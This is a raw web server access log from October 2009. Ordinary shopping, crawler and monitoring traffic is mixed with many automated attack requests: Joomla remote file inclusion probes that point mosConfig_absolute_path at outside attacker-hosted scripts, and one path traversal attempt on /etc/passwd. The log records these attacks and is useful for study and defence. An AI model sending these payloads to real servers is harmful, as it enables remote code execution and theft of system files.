121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:19 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:19 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:19 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:19 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:19 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:19 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
211.47.71.89 - - [12/Oct/2009:02:18:20 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:18:20 -0400] "GET /logs/access_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:18:20 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:18:20 -0400] "GET /logs/error_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.169.189.169 - - [12/Oct/2009:02:18:20 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG HTTP/1.1" 200 77205 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:21 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:21 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:22 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:22 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:22 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:22 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:22 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:22 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:23 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:23 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:23 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244A07197900F0C800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:23 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
211.47.71.89 - - [12/Oct/2009:02:18:23 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:18:23 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:18:23 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:18:23 -0400] "GET /logs/error_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.169.189.169 - - [12/Oct/2009:02:18:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B244E02E91900F84800H+M37+ENG HTTP/1.1" 200 42218 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:24 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244E02E91900F84800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:24 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244E02E91900F84800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:25 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B254202F929000F5800H+M37+ENG HTTP/1.1" 200 49074 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B244E02E91900F84800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:31 -0400] "GET /images/next_white.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B254202F929000F5800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:31 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:34 -0400] "GET /images/next_white-over.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B254202F929000F5800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B25480CB9890003A800H+M37+ENG HTTP/1.1" 200 41057 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B254202F929000F5800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:35 -0400] "GET /images/previous_white.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B25480CB9890003A800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:37 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
67.205.103.171 - - [12/Oct/2009:02:18:40 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:18:44 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:18:44 -0400] "GET /logs/access_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.169.189.169 - - [12/Oct/2009:02:18:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B254C0E6939000CD800H+M37+ENG HTTP/1.1" 200 49079 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B25480CB9890003A800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:50 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:52 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B254A0DD98900165800H+M37+ENG HTTP/1.1" 200 42300 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B254C0E6939000CD800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:53 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B254D08292900176800H+M37+ENG HTTP/1.1" 200 40011 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B254A0DD98900165800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
209.59.12.99 - - [12/Oct/2009:02:19:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.127 - - [12/Oct/2009:02:20:00 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.218.116.164 - - [12/Oct/2009:02:20:07 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
220.181.7.130 - - [12/Oct/2009:02:20:08 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.241.32.194 - - [12/Oct/2009:02:20:21 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:20:21 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:20:21 -0400] "GET /logs/access_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
67.218.116.132 - - [12/Oct/2009:02:20:36 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.241.32.194 - - [12/Oct/2009:02:20:38 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:20:38 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:20:38 -0400] "GET /logs/access_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:20:44 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:20:44 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:20:44 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:06 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:06 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:06 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
221.143.43.216 - - [12/Oct/2009:02:21:13 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:21:14 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:21:14 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:21:14 -0400] "GET /logs/access_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:21:34 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:40 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:40 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:40 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:40 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:40 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:02:21:40 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:02:21:42 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:02:21:42 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:02:21:42 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:02:22:24 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:02:22:24 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:02:22:24 -0400] "GET /logs/access_log.Q109071600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:22:36 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:22:36 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:02:22:36 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/heheh.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
201.76.47.207 - - [12/Oct/2009:02:22:59 -0400] "GET /logs/access_log.Q109070700/index.php?pag=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
93.186.192.24 - - [12/Oct/2009:02:23:03 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:23:46 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:23:46 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:02:23:46 -0400] "GET /logs/access_log.Q109071600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
